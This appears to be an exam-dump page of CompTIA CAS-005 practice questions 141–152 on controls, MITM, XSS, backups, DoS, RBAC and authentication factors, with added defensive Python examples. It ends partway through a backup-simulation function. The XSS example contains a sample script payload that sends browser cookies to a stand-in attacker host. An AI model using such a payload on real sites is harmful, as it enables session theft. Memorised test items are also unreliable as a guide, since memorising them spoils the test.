CompTIA CAS-005 SecurityX Exam Dumps and Practice Test Questions Set 8 Q141-160
Question 141:
Which type of security control is focused on creating and enforcing policies, procedures, and guidelines within an organization?
A. Technical control
B. Administrative control
C. Physical control
D. Detective control
Answer: B. Administrative control
Explanation:
Technical control: Technical controls are implemented through technology, such as firewalls, intrusion detection systems, antivirus software, encryption, or access control mechanisms. While technical controls enforce security through automated processes, they are limited to what systems can enforce. In the context of policies, technology alone cannot dictate organizational behavior, decision-making, or compliance culture. CAS-005 emphasizes that technical controls are essential for enforcement but must be complemented by administrative and physical controls to create a holistic security posture. For example, a firewall can block unauthorized access, but without administrative policies defining acceptable use and escalation procedures, the organization may still be vulnerable to insider misuse or misconfiguration.
Administrative control: Administrative controls are security measures defined through policies, procedures, standards, and guidelines that dictate how personnel, processes, and technologies operate securely. Examples include security awareness training, incident response procedures, change management policies, and acceptable use policies. CAS-005 underscores that administrative controls are foundational to risk management because they establish expectations, responsibilities, and accountability for human behavior, which is often the weakest link in security. Proper administrative controls reduce the risk of insider threats, social engineering attacks, operational errors, and compliance violations. They provide the framework within which technical and physical controls operate. Effective administrative controls include clearly documented policies, regular training, auditing and monitoring compliance, enforcement mechanisms, and continual improvement through lessons learned. For instance, a policy may mandate multi-factor authentication (MFA), while the technical control (MFA system) enforces it. Administrative controls guide the deployment and proper use of technical tools, ensuring users understand their responsibilities and security procedures.
Physical control: Physical controls protect tangible assets like buildings, equipment, or personnel. Examples include security badges, locks, security cameras, and environmental protections. While physical controls prevent unauthorized access and theft, they do not directly dictate procedural compliance or organizational policy. CAS-005 notes that physical controls complement administrative controls by providing a tangible layer of security but cannot replace policies or procedures that govern human behavior or operational standards.
Detective control: Detective controls identify and alert on security incidents, such as intrusion detection systems, audit logs, or security event monitoring. While detective controls inform administrators of potential policy violations or security breaches, they do not establish rules or guide behavior proactively. CAS-005 emphasizes that detective controls are reactive by nature, identifying events after they occur, whereas administrative controls are proactive and foundational to prevention.
In summary, administrative controls create the organizational framework for security, guiding technical and physical measures. They are the backbone of a mature security program, defining how people and processes interact with technology to maintain confidentiality, integrity, and availability. Administrative controls also ensure regulatory compliance and provide a structured approach to risk management, emphasizing that technology alone cannot secure an organization.
Question 142:
Which type of attack intercepts and potentially alters communications between two parties without their knowledge?
A. Man-in-the-Middle (MITM)
B. SQL Injection
C. Cross-Site Scripting (XSS)
D. Phishing
Answer: A. Man-in-the-Middle (MITM)
Explanation:
Man-in-the-Middle (MITM): MITM attacks occur when an attacker secretly intercepts communications between two parties, potentially eavesdropping or manipulating data in transit. CAS-005 stresses understanding MITM as a critical confidentiality and integrity threat. Attackers can exploit unencrypted connections, weak authentication, or compromised network nodes to inject malicious commands, capture credentials, or alter transactions. MITM attacks highlight the importance of secure protocols such as TLS/SSL, certificate validation, mutual authentication, and network monitoring. In enterprise environments, MITM can target emails, VPNs, VoIP, or web applications. Preventive measures include strong encryption, certificate pinning, proper key management, and endpoint security. CAS-005 candidates must understand MITM attack vectors, detection strategies, and mitigation through layered security controls.
SQL Injection: SQL injection targets vulnerabilities in database-driven applications, allowing attackers to execute malicious queries to manipulate or exfiltrate data. While SQL injection threatens data integrity and confidentiality, it is application-specific and does not intercept or alter communications between two legitimate parties. CAS-005 differentiates SQL injection as a data-centric attack vector, focusing on input validation, parameterized queries, and secure coding practices to prevent exploitation.
Cross-Site Scripting (XSS): XSS injects scripts into web pages that execute in a user’s browser. XSS can steal cookies, modify content, or perform actions on behalf of users. CAS-005 highlights XSS as a client-side vulnerability, distinct from MITM attacks because it exploits user interactions with web applications rather than intercepting communications in transit. XSS mitigation includes input validation, output encoding, content security policies, and secure coding practices.
Phishing: Phishing manipulates users into disclosing credentials or sensitive information via deceptive messages or websites. CAS-005 emphasizes phishing as a social engineering attack targeting human behavior rather than intercepting communications. Preventive measures include awareness training, email filtering, and multi-factor authentication. Phishing may be a precursor to MITM attacks but is not itself an intercepting attack.
MITM attacks are particularly dangerous because they simultaneously compromise confidentiality and integrity, potentially undetected, making detection and prevention a critical focus in CAS-005.
Question 143:
Which security principle ensures that sensitive information is only accessible by authorized individuals?
A. Integrity
B. Confidentiality
C. Availability
D. Non-repudiation
Answer: B. Confidentiality
Explanation:
Integrity: Integrity ensures data accuracy, consistency, and protection from unauthorized modification. CAS-005 emphasizes integrity for preventing tampering, but integrity alone does not restrict access to authorized users.
Confidentiality: Confidentiality ensures that sensitive information is accessible only to authorized individuals or systems. CAS-005 identifies confidentiality as a foundational element of the CIA triad. Methods include encryption, access controls, strong authentication, network segmentation, and policy enforcement. Breaches of confidentiality can result from data theft, insider threats, social engineering, or misconfigured systems. Maintaining confidentiality requires both technical controls (encryption, access restrictions) and administrative controls (policies, awareness training). CAS-005 emphasizes that protecting confidentiality is essential for compliance with regulatory requirements like GDPR, HIPAA, and PCI-DSS. Threats to confidentiality must be mitigated with layered defense, including endpoint security, monitoring, network security, and incident response.
Availability: Availability ensures users can access systems and data when needed. While CAS-005 highlights availability as critical, it does not guarantee restricted access to information.
Non-repudiation: Non-repudiation prevents denial of actions, often using digital signatures. CAS-005 stresses non-repudiation for accountability, but it does not control access to sensitive data.
Confidentiality is central to protecting organizational secrets, personal data, and intellectual property. CAS-005 encourages candidates to understand technical and procedural mechanisms to enforce confidentiality while balancing usability and operational needs.
Question 144:
Which type of attack exploits vulnerabilities in web applications to inject malicious code that executes in a user’s browser?
A. SQL Injection
B. Cross-Site Scripting (XSS)
C. Man-in-the-Middle (MITM)
D. Phishing
Answer: B. Cross-Site Scripting (XSS)
Explanation:
SQL Injection: SQL injection targets databases, executing unauthorized queries via user inputs. CAS-005 emphasizes SQLi as a server-side threat, whereas XSS is client-side. SQLi compromises data integrity and confidentiality but does not execute scripts in a user’s browser.
Cross-Site Scripting (XSS): XSS injects malicious scripts into web pages viewed by users. CAS-005 highlights XSS as a major web application vulnerability affecting confidentiality, integrity, and potentially availability. XSS attacks can be stored (persistent), reflected (non-persistent), or DOM-based, exploiting client-side code execution. Attackers can steal session tokens, manipulate DOM elements, or perform unauthorized actions on behalf of users. Prevention includes input validation, output encoding, secure frameworks, content security policies, and awareness of browser behavior. CAS-005 candidates must understand XSS vectors, mitigation strategies, and the impact on user data confidentiality and trust.
Man-in-the-Middle (MITM): MITM intercepts communications between two parties. While it can complement XSS attacks, MITM operates on network traffic rather than browser-side script execution. CAS-005 differentiates MITM as a transport-level attack versus XSS as a client-side attack.
Phishing: Phishing manipulates human behavior to disclose credentials. CAS-005 emphasizes that phishing is social engineering, not code injection, although phishing can lead users to XSS-vulnerable sites.
XSS is critical in CAS-005 because web applications are prevalent, and client-side attacks can bypass server-side controls. Defense in depth includes secure coding, runtime protections, and user education.
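The stored XSS case described above, shown as a vulnerable renderer beside its output-encoded fix. This is an added example and not code from the page; the comment list, the attacker URL and the CSP value are constructed for illustration.

```python
import html

# Constructed stored comments (sample data): the second one carries a script payload
# that would run in every visitor's browser if rendered without encoding.
COMMENTS = [
    "Nice post!",
    "<script>fetch('https://attacker.example/?c=' + document.cookie)</script>",
]

def render_unsafe(comments):
    """Vulnerable: user-supplied text is concatenated straight into the HTML body."""
    return "<ul>" + "".join(f"<li>{c}</li>" for c in comments) + "</ul>"

def render_safe(comments):
    """Fixed: encode for the HTML text context. quote=True also neutralises quotes,
    so the same helper is safe when the value lands inside an attribute."""
    return "<ul>" + "".join(f"<li>{html.escape(c, quote=True)}</li>" for c in comments) + "</ul>"

def csp_header():
    """Defense in depth: a policy that refuses inline scripts even if one encoding call is missed."""
    return "Content-Security-Policy: default-src 'self'; script-src 'self'; object-src 'none'"

def contains_active_script(page: str) -> bool:
    """Crude check used here to show the difference between the two renderers."""
    return "<script" in page.lower()

if __name__ == "__main__":
    print(render_unsafe(COMMENTS))
    print(render_safe(COMMENTS))
    print(csp_header())
```

In the encoded version the payload survives as visible text (`&lt;script&gt;...`) but never becomes markup; the browser shows the attacker's comment instead of executing it.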
Question 145:
Which type of backup captures only the changes made since the last full backup, optimizing storage while ensuring complete recovery?
A. Full backup
B. Incremental backup
C. Differential backup
D. Snapshot backup
Answer: C. Differential backup
Explanation:
Full backup: A full backup copies all selected files every time, ensuring complete recovery but consuming maximum storage and time. CAS-005 emphasizes full backups as foundational, but differential backups improve efficiency.
Incremental backup: Incremental backups copy only changes since the last backup of any type. They are space-efficient but require all incremental sets plus the last full backup for recovery, increasing restoration complexity. CAS-005 highlights trade-offs in speed, storage, and recovery.
Differential backup: Differential backups copy changes since the last full backup. CAS-005 emphasizes that differential backups strike a balance between storage efficiency and recovery speed. Only the last full backup and the latest differential backup are needed for restoration. Implementation requires monitoring, scheduling, and secure storage to maintain integrity and availability. Differential backups are integral to disaster recovery and business continuity planning.
Snapshot backup: Snapshots capture the state of a system or volume at a specific point in time. CAS-005 notes snapshots are often used for quick rollback but are not substitutes for full or differential backups in long-term recovery strategies.
Differential backups are critical for CAS-005 candidates to understand efficient data protection, recovery planning, and balancing RPO/RTO objectives.
Question 146:
Which type of attack attempts to overwhelm a system or network with excessive traffic, rendering it unavailable to legitimate users?
A. Phishing
B. Denial-of-Service (DoS)
C. SQL Injection
D. Cross-Site Scripting (XSS)
Answer: B. Denial-of-Service (DoS)
Explanation:
Phishing: Phishing attacks exploit human psychology rather than technical vulnerabilities. Attackers send deceptive emails, messages, or links to trick users into divulging credentials, installing malware, or performing actions beneficial to the attacker. While phishing can compromise confidentiality and sometimes integrity, it does not disrupt system availability directly. CAS-005 emphasizes phishing as a social engineering vector, highlighting mitigation through user awareness training, email filtering, multi-factor authentication, and anti-phishing tools. Phishing campaigns can be precursors to other attacks, including DoS, by compromising insider accounts, but by itself, phishing is not a DoS attack.
Denial-of-Service (DoS): DoS attacks are specifically designed to target availability, one of the pillars of the CIA triad. CAS-005 candidates must understand that a DoS attack overwhelms system resources—such as CPU, memory, or network bandwidth—preventing legitimate users from accessing services. Typical vectors include malformed packets, excessive connection requests, or application-level floods. DoS attacks can be launched from a single source, while Distributed Denial-of-Service (DDoS) attacks use multiple compromised systems to amplify the impact. Mitigation strategies include rate limiting, traffic filtering, content delivery networks (CDNs), intrusion prevention systems, and coordination with Internet Service Providers (ISPs). Proper monitoring and incident response plans are critical to detect and remediate DoS attacks promptly. CAS-005 stresses understanding the real-world impact on business continuity, customer trust, and regulatory compliance.
SQL Injection: SQL injection attacks target database-driven applications by injecting malicious SQL queries, enabling attackers to manipulate data, bypass authentication, or exfiltrate sensitive information. CAS-005 categorizes SQLi as a confidentiality and integrity threat, not primarily an availability threat, although poorly handled queries could cause resource exhaustion as a side effect. Preventing SQL injection relies on input validation, parameterized queries, stored procedures, and secure coding practices.
Cross-Site Scripting (XSS): XSS injects scripts into web pages that execute on user browsers, targeting confidentiality and integrity. CAS-005 notes XSS can compromise session tokens, redirect users, or manipulate web content but does not inherently prevent legitimate access to the service itself. XSS attacks require mitigation through secure coding, content security policies, input validation, and browser-side protections.
In summary, DoS attacks are critical for CAS-005 candidates to understand because they directly compromise availability. Designing resilient networks with layered controls, redundancy, and proactive monitoring helps ensure service continuity even under attack conditions.
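One of the mitigations named above, rate limiting, as an added example rather than code from the page: a per-source token bucket run over a constructed request trace in which one address floods at 100 requests per second while a normal client sends two per second. The addresses, the rate of 5 requests per second and the burst of 10 are assumptions chosen for the demonstration; time is kept in integer milliseconds so the result is exact.

```python
from collections import defaultdict

class TokenBucket:
    """Token bucket with integer arithmetic: time in milliseconds, tokens scaled by 1000."""
    SCALE = 1000

    def __init__(self, rate_per_sec: int, burst: int):
        self.rate = rate_per_sec              # tokens/second == millitokens/millisecond
        self.capacity = burst * self.SCALE    # maximum burst, in millitokens
        self.tokens = self.capacity
        self.last_ms = None

    def allow(self, now_ms: int) -> bool:
        # Refill proportionally to elapsed time, capped at the burst size.
        if self.last_ms is not None:
            self.tokens = min(self.capacity, self.tokens + (now_ms - self.last_ms) * self.rate)
        self.last_ms = now_ms
        if self.tokens >= self.SCALE:
            self.tokens -= self.SCALE
            return True
        return False

class PerSourceLimiter:
    """One bucket per source address, so a flood from one host cannot starve the others."""
    def __init__(self, rate_per_sec: int, burst: int):
        self.buckets = defaultdict(lambda: TokenBucket(rate_per_sec, burst))

    def allow(self, source: str, now_ms: int) -> bool:
        return self.buckets[source].allow(now_ms)

def constructed_trace():
    """Constructed request trace (timestamp_ms, source): 10.0.0.9 floods for 2 s at 100 req/s,
    192.0.2.5 is a legitimate client at 2 req/s."""
    flood = [(i * 10, "10.0.0.9") for i in range(200)]
    legit = [(i * 500, "192.0.2.5") for i in range(4)]
    return sorted(flood + legit)

def run(trace, rate_per_sec: int = 5, burst: int = 10):
    limiter = PerSourceLimiter(rate_per_sec, burst)
    counts = defaultdict(lambda: {"allowed": 0, "dropped": 0})
    for ts, src in trace:
        counts[src]["allowed" if limiter.allow(src, ts) else "dropped"] += 1
    return {src: dict(c) for src, c in counts.items()}

if __name__ == "__main__":
    print(run(constructed_trace()))
```

The flooding host gets its initial burst of 10 and then only the sustained rate (one request per 20 it sends at this ratio), while the normal client is never throttled. Against a distributed flood the same logic must move to the edge (CDN, scrubbing provider, ISP) because many sources each stay under the per-source limit.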
Question 147:
Which principle of security involves dividing critical tasks among multiple individuals to reduce the risk of fraud or error?
A. Principle of least privilege
B. Separation of duties
C. Defense in depth
D. Mandatory access control
Answer: B. Separation of duties
Explanation:
Principle of least privilege: This principle restricts access rights for users, systems, and processes to the minimum required for their function. CAS-005 emphasizes least privilege to minimize attack surface and limit insider threats. While it reduces risk, it does not explicitly divide responsibilities among multiple individuals.
Separation of duties: Separation of duties (SoD) ensures that critical tasks are distributed across multiple personnel so no single individual has complete control over sensitive operations. CAS-005 highlights SoD as a key administrative control to prevent fraud, errors, or misuse. Examples include financial transaction approvals, code deployment, or access provisioning. Proper implementation requires defining complementary roles, monitoring compliance, auditing, and integrating with access control systems. SoD enhances accountability, integrity, and risk mitigation by ensuring collusion or single-person errors cannot compromise critical processes. CAS-005 candidates must also understand the interplay between SoD and least privilege, role-based access control, and automated auditing systems.
Defense in depth: Defense in depth is a layered security strategy that combines technical, administrative, and physical controls to protect assets. While SoD can be a part of defense in depth, defense in depth is broader and encompasses multiple layers of protection beyond task segregation.
Mandatory access control: MAC enforces access based on labels or classifications. While MAC is strict and limits access, it does not inherently enforce task separation or distribute responsibilities among multiple users. CAS-005 distinguishes MAC as an access control enforcement mechanism, not a procedural fraud mitigation technique.
Separation of duties is essential for CAS-005 candidates to understand because it reduces the likelihood of malicious or accidental compromise, ensures process integrity, and supports compliance frameworks such as SOX or PCI-DSS. Effective SoD policies integrate with RBAC, auditing, monitoring, and technical enforcement to maintain a robust security posture.
Question 148:
Which cloud service model provides hardware, software, and networking resources while allowing organizations to deploy and manage applications?
A. Infrastructure as a Service (IaaS)
B. Platform as a Service (PaaS)
C. Software as a Service (SaaS)
D. Function as a Service (FaaS)
Answer: B. Platform as a Service (PaaS)
Explanation:
Infrastructure as a Service (IaaS): IaaS provides virtualized hardware, storage, and network resources over the cloud. Organizations maintain control over operating systems, applications, and middleware, allowing flexible deployment but requiring management of security, patches, and configurations. CAS-005 emphasizes IaaS for candidates to understand shared responsibility models, virtualization risks, and security of compute, storage, and networking resources.
Platform as a Service (PaaS): PaaS provides a managed platform including operating systems, development tools, and runtime environments, allowing organizations to deploy and run applications without managing underlying infrastructure. CAS-005 highlights PaaS as reducing administrative overhead while still requiring attention to application security, identity and access management, and compliance. Security responsibilities in PaaS include application logic, authentication, data encryption, and monitoring, while the provider manages platform patching and underlying hardware security. PaaS facilitates rapid development, scalability, and integration with DevOps pipelines. CAS-005 candidates must understand PaaS security implications, including containerization, API security, and isolation of workloads.
Software as a Service (SaaS): SaaS provides complete applications managed by the provider. Users focus on functionality without handling underlying infrastructure or application code. CAS-005 emphasizes SaaS for end-user security considerations like identity management, data protection, and secure configurations, but it does not offer the same level of control as PaaS for application deployment.
Function as a Service (FaaS): FaaS enables event-driven, serverless computing where functions run in response to triggers. CAS-005 notes that while FaaS abstracts infrastructure management, security responsibilities include code integrity, authentication, logging, and monitoring. FaaS is often grouped under PaaS, but it abstracts even more of the platform (there is no long-running runtime to manage) and requires developers to consider the security of ephemeral execution environments.
PaaS balances control and convenience, allowing organizations to focus on application development while relying on provider-managed platforms. CAS-005 candidates must understand risk management, shared responsibility, encryption, API security, and compliance in PaaS environments.
Question 149:
Which authentication method relies on something a user knows, such as a password or PIN?
A. Knowledge factor
B. Possession factor
C. Inherence factor
D. Location factor
Answer: A. Knowledge factor
Explanation:
Knowledge factor: Knowledge factors are authentication methods based on something the user knows, such as passwords, PINs, or answers to security questions. CAS-005 emphasizes understanding knowledge factors because they are widely used but vulnerable to attacks like phishing, social engineering, or brute-force attacks. Security considerations include enforcing strong passwords, multi-factor authentication, password rotation, and secure storage using hashing algorithms. Knowledge factors remain a foundational element of authentication systems, but they must be combined with other factors to strengthen identity verification.
Possession factor: Possession factors rely on items the user physically possesses, such as smart cards, tokens, or mobile devices. CAS-005 highlights possession factors as complementary to knowledge factors in multi-factor authentication. Possession factors enhance security but do not function alone in this scenario.
Inherence factor: Inherence factors are based on biometrics, including fingerprints, facial recognition, or iris scans. They provide strong authentication but are not the primary example of “something the user knows.” CAS-005 emphasizes inherence factors for high-security contexts but notes privacy and false-positive considerations.
Location factor: Location factors rely on geolocation or network-based context for authentication. CAS-005 covers location as an additional authentication dimension, often used in adaptive or conditional access, but it is not “knowledge-based.”
Knowledge factors are essential in CAS-005 because they form the basis for most legacy authentication systems and remain relevant in multi-factor implementations. Proper implementation ensures confidentiality, prevents unauthorized access, and supports secure enterprise identity management.
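The "secure storage using hashing algorithms" point above, as an added example (not code from the page): a salted, iterated PBKDF2-HMAC-SHA256 verifier beside an unsalted MD5 hash of the kind legacy systems still use, showing why the salt and the constant-time comparison matter. The storage string format and the iteration count are assumptions; the count should be tuned upward until one hash takes roughly 100 ms on the authenticating host.

```python
import hashlib
import hmac
import os

ITERATIONS = 200_000   # assumption: raise until a single hash costs ~100 ms on the target hardware

def hash_password(password: str, iterations: int = ITERATIONS) -> str:
    """Return a self-describing record: algorithm, iterations, random salt and derived key."""
    salt = os.urandom(16)
    digest = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"), salt, iterations)
    return f"pbkdf2_sha256${iterations}${salt.hex()}${digest.hex()}"

def verify_password(password: str, stored: str) -> bool:
    """Re-derive with the stored salt/iterations and compare in constant time."""
    algo, iterations, salt_hex, digest_hex = stored.split("$")
    if algo != "pbkdf2_sha256":
        return False
    digest = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"),
                                 bytes.fromhex(salt_hex), int(iterations))
    return hmac.compare_digest(digest.hex(), digest_hex)

def hash_password_legacy(password: str) -> str:
    """Weak 'before' form: unsalted, single-round MD5. Equal passwords give equal hashes,
    so one cracked hash (or a rainbow table) exposes every user with that password."""
    return hashlib.md5(password.encode("utf-8")).hexdigest()

def demo():
    pw = "correct horse battery staple"
    stored_a = hash_password(pw)
    stored_b = hash_password(pw)
    return {
        "salted_differently": stored_a != stored_b,          # same password, different records
        "accepts_correct": verify_password(pw, stored_a),
        "rejects_wrong": verify_password("Correct horse battery staple", stored_a),
        "legacy_collides": hash_password_legacy(pw) == hash_password_legacy(pw),
    }

if __name__ == "__main__":
    print(demo())
```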
Question 150:
Which type of access control assigns permissions based on roles within an organization?
A. Discretionary Access Control (DAC)
B. Mandatory Access Control (MAC)
C. Role-Based Access Control (RBAC)
D. Rule-Based Access Control
Answer: C. Role-Based Access Control (RBAC)
Explanation:
Discretionary Access Control (DAC): DAC allows resource owners to determine access to objects they own. CAS-005 notes DAC is flexible but can lead to inconsistent permissions, accidental exposure, or privilege escalation. It is not role-based; access is individualized per user.
Mandatory Access Control (MAC): MAC enforces strict policies based on labels or classifications. Users cannot modify access permissions. While highly secure, MAC is not inherently role-based and is often used in military or high-security environments. CAS-005 emphasizes MAC for high-assurance systems.
Role-Based Access Control (RBAC): RBAC assigns permissions based on roles defined by job functions. CAS-005 stresses RBAC for managing access at scale, reducing administrative complexity, enforcing least privilege, and ensuring auditability. Roles map to responsibilities, making onboarding and offboarding efficient. Security measures include role definition, segregation of duties, periodic reviews, and integration with authentication systems. RBAC simplifies compliance with regulatory standards and supports automated provisioning, logging, and monitoring.
Rule-Based Access Control: Rule-based controls grant access based on conditions such as time, location, or system state. CAS-005 highlights rule-based access as dynamic, but rules complement RBAC rather than replace role-centric permissions.
RBAC is critical in CAS-005 environments because it enables scalable, auditable, and least-privilege-aligned access management, essential for enterprise security, compliance, and risk reduction.
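The interplay between RBAC and separation of duties discussed in Question 147 and here, as an added example (not code from the page): a role-to-permission map plus a list of permission pairs that must never be held by one person, with the SoD check enforced at role-assignment time so the toxic combination can never be provisioned. The role names, permission strings and conflict pairs are constructed for illustration.

```python
from collections import defaultdict

# Constructed roles: each maps a job function to the permissions it needs (least privilege).
ROLE_PERMISSIONS = {
    "developer":       {"code:commit", "build:run"},
    "release_manager": {"deploy:prod"},
    "ap_clerk":        {"invoice:create"},
    "ap_approver":     {"invoice:approve"},
    "auditor":         {"log:read"},
}

# Separation-of-duties constraints: no single identity may hold both halves of a pair.
SOD_CONFLICTS = [
    ("invoice:create", "invoice:approve"),   # creating and approving the same payment
    ("code:commit", "deploy:prod"),          # writing code and shipping it unreviewed
]

class RBAC:
    def __init__(self, role_permissions, sod_conflicts):
        self.role_permissions = role_permissions
        self.sod_conflicts = sod_conflicts
        self.user_roles = defaultdict(set)

    def permissions_of(self, user):
        perms = set()
        for role in self.user_roles[user]:
            perms |= self.role_permissions[role]
        return perms

    def sod_violations(self, perms):
        return [pair for pair in self.sod_conflicts if pair[0] in perms and pair[1] in perms]

    def assign(self, user, role):
        """Grant a role only if the resulting permission set stays free of SoD conflicts."""
        candidate = self.permissions_of(user) | self.role_permissions[role]
        violations = self.sod_violations(candidate)
        if violations:
            raise PermissionError(f"SoD violation for {user}: {violations}")
        self.user_roles[user].add(role)

    def check(self, user, permission):
        return permission in self.permissions_of(user)

    def audit(self):
        """Periodic review: every user with their effective permissions and any conflicts."""
        return {u: {"permissions": sorted(self.permissions_of(u)),
                    "violations": self.sod_violations(self.permissions_of(u))}
                for u in self.user_roles}

def demo():
    rbac = RBAC(ROLE_PERMISSIONS, SOD_CONFLICTS)
    rbac.assign("carol", "ap_clerk")
    try:
        rbac.assign("carol", "ap_approver")   # would let carol create and approve invoices
        blocked = False
    except PermissionError:
        blocked = True
    rbac.assign("dave", "ap_approver")
    rbac.assign("erin", "developer")
    return {
        "carol_can_create": rbac.check("carol", "invoice:create"),
        "carol_can_approve": rbac.check("carol", "invoice:approve"),
        "sod_blocked_carol": blocked,
        "dave_can_approve": rbac.check("dave", "invoice:approve"),
        "erin_can_deploy": rbac.check("erin", "deploy:prod"),
        "audit_clean": all(not v["violations"] for v in rbac.audit().values()),
    }

if __name__ == "__main__":
    print(demo())
```

The check runs on the effective permission set, not on role names, so it still catches a conflict introduced by a new role that happens to bundle both sides of a pair.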
Question 151:
Which type of attack involves intercepting communications between two parties to eavesdrop, steal information, or manipulate messages?
A. Man-in-the-Middle (MITM)
B. Phishing
C. Cross-Site Scripting (XSS)
D. Denial-of-Service (DoS)
Answer: A. Man-in-the-Middle (MITM)
Explanation:
Man-in-the-Middle (MITM): MITM attacks occur when an attacker secretly intercepts and potentially alters communication between two parties. CAS-005 emphasizes understanding MITM because it threatens confidentiality, integrity, and, in some cases, authentication. MITM can occur over networks, including public Wi-Fi, through ARP poisoning, DNS spoofing, or SSL/TLS stripping. Attackers can eavesdrop on sensitive information such as login credentials, financial data, or personal information, or manipulate messages to inject malicious content. Mitigation strategies include implementing end-to-end encryption, certificate validation, secure protocols (HTTPS, SSH, VPN), intrusion detection systems, network segmentation, and user awareness. CAS-005 candidates must understand how MITM attacks exploit trust relationships in network communications and the importance of cryptographic controls and secure key management to prevent such attacks. Proper logging and anomaly detection can help identify MITM attempts, while proactive measures like certificate pinning and mutual TLS reduce risks in enterprise environments.
Phishing: Phishing is a social engineering attack where attackers trick individuals into revealing credentials or sensitive data through deceptive emails, messages, or websites. CAS-005 highlights phishing as an exploitation of human behavior rather than direct interception of network communication. While phishing can precede MITM attacks by providing credentials, it does not directly involve monitoring or altering data in transit. Mitigation focuses on user awareness, email filtering, domain-based message authentication, reporting mechanisms, and multi-factor authentication.
Cross-Site Scripting (XSS): XSS attacks target web applications by injecting scripts into web pages that execute in users’ browsers. CAS-005 notes XSS impacts confidentiality and integrity of client-side data but does not involve intercepting or altering communications between two parties over a network. Preventive measures include secure coding practices, input validation, output encoding, and content security policies.
Denial-of-Service (DoS): DoS attacks aim to make systems unavailable by overwhelming resources. CAS-005 teaches DoS as an availability threat rather than an interception or manipulation of communications. Mitigation includes traffic filtering, rate limiting, and DDoS protection services.
Understanding MITM attacks in CAS-005 is essential for designing secure network architectures, enforcing encryption, and maintaining trust in communications. End-to-end encryption, proper certificate management, and secure session handling ensure data confidentiality and integrity. Candidates should also recognize advanced MITM techniques, such as SSL stripping, session hijacking, and Wi-Fi spoofing, and implement layered defenses using technical, administrative, and procedural controls.
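The integrity half of the MITM problem described in Question 142 and here, as an added example that is not code from the page: two parties share a key out of band and attach an HMAC-SHA256 tag to each message; an attacker in the path can read and rewrite the body but cannot produce a valid tag, so the receiver rejects the altered transfer. The shared key, message fields and the "attacker-acct" value are constructed; in practice TLS provides this integrity (plus confidentiality, which an HMAC alone does not) and the key-distribution problem is solved by certificates.

```python
import hashlib
import hmac
import json
from typing import Optional

# Assumption: both endpoints already hold this key. A passive eavesdropper still sees the
# plaintext; this example shows tamper detection, not encryption.
SHARED_KEY = b"demo-shared-secret-do-not-reuse"

def canonical(message: dict) -> bytes:
    """Deterministic serialisation so sender and receiver MAC the same bytes."""
    return json.dumps(message, sort_keys=True, separators=(",", ":")).encode("utf-8")

def protect(message: dict, key: bytes = SHARED_KEY) -> dict:
    """Sender: attach an HMAC-SHA256 tag over the canonical body."""
    body = canonical(message)
    tag = hmac.new(key, body, hashlib.sha256).hexdigest()
    return {"body": body.decode("utf-8"), "tag": tag}

def verify(envelope: dict, key: bytes = SHARED_KEY) -> Optional[dict]:
    """Receiver: recompute the tag and compare in constant time; None means 'reject'."""
    body = envelope["body"].encode("utf-8")
    expected = hmac.new(key, body, hashlib.sha256).hexdigest()
    if not hmac.compare_digest(expected, envelope["tag"]):
        return None
    return json.loads(body)

def intercept_and_alter(envelope: dict) -> dict:
    """Attacker in the path: read the message, change the payee, forward the old tag."""
    tampered = json.loads(envelope["body"])
    tampered["to"] = "attacker-acct"
    return {"body": canonical(tampered).decode("utf-8"), "tag": envelope["tag"]}

def demo():
    original = {"from": "alice", "to": "bob", "amount": 250}
    env = protect(original)
    accepted = verify(env)                       # untouched message is accepted
    rejected = verify(intercept_and_alter(env))  # altered message fails the tag check
    return accepted, rejected

if __name__ == "__main__":
    print(demo())
```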
Question 152:
Which type of backup copies only the data that has changed since the last backup of any type, minimizing storage requirements and backup time?
A. Full Backup
B. Differential Backup
C. Incremental Backup
D. Snapshot
Answer: C. Incremental Backup
Explanation:
Full Backup: A full backup copies all selected files or systems every time it runs, ensuring a complete recovery set. CAS-005 emphasizes full backups for disaster recovery as they simplify restoration and minimize dependency on multiple backup sets. However, full backups are time-consuming and require significant storage, making them less efficient for frequent backups.
Differential Backup: Differential backups copy all data that has changed since the last full backup. CAS-005 notes differential backups simplify recovery compared to incremental because only the last full backup and the latest differential backup are needed. However, differential backups grow over time and consume more storage than incremental backups.
Incremental Backup: Incremental backups copy only the data that has changed since the last backup of any type, whether full or incremental. CAS-005 emphasizes incremental backups for their efficiency, minimal storage use, and rapid execution. However, restoration requires the last full backup and all subsequent incremental backups, making recovery more complex. Candidates must understand the trade-offs between recovery time objectives (RTO) and storage efficiency. Best practices include regularly combining incremental backups with full backups, testing restoration procedures, and ensuring encryption of backup data for confidentiality. Incremental backups are foundational in enterprise backup strategies, particularly for organizations with large datasets and frequent changes. They reduce network load, storage requirements, and backup window duration while maintaining compliance with data retention policies.
Snapshot: Snapshots capture the state of a system or volume at a specific point in time, providing rapid rollback or recovery. CAS-005 notes snapshots are efficient for operational recovery but may not meet long-term archival needs or comprehensive disaster recovery requirements. Snapshots are typically used alongside full, differential, or incremental backups.
Incremental backups align with CAS-005 objectives by providing efficient, secure, and manageable backup solutions that balance storage, time, and recovery requirements. Candidates must understand backup strategies, encryption, offsite storage, retention policies, and restoration testing to ensure enterprise data resilience.
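The trade-off between differential (Question 145) and incremental (this question) backups, as an added example that is not code from the page: a small simulation runs both strategies over a constructed four-day change history, then compares how many jobs a restore needs and how many file copies each strategy stores. The file names and contents are sample data.

```python
from dataclasses import dataclass

@dataclass
class BackupJob:
    day: int
    kind: str    # "full", "incremental" or "differential"
    files: dict  # filename -> content captured by this job

# Constructed change history (sample data): day 0 is the initial full data set,
# later entries list the files that changed on that day.
CHANGES = [
    {"a.txt": "a0", "b.txt": "b0", "c.txt": "c0", "d.txt": "d0"},  # day 0
    {"a.txt": "a1"},                                               # day 1
    {"b.txt": "b2"},                                               # day 2
    {"a.txt": "a3", "c.txt": "c3"},                                # day 3
]

def simulate(changes, strategy):
    """Take a full backup on day 0, then one backup per day using the strategy:
    "incremental" captures changes since the last backup of any type,
    "differential" captures everything changed since the last full."""
    jobs = []
    since_full, since_any = {}, {}
    for day, delta in enumerate(changes):
        if day == 0:
            jobs.append(BackupJob(day, "full", dict(delta)))
            continue
        since_full.update(delta)
        since_any.update(delta)
        if strategy == "incremental":
            jobs.append(BackupJob(day, "incremental", dict(since_any)))
            since_any = {}                    # next incremental starts from this job
        elif strategy == "differential":
            jobs.append(BackupJob(day, "differential", dict(since_full)))
        else:
            raise ValueError(strategy)
    return jobs

def restore_chain(jobs, target_day):
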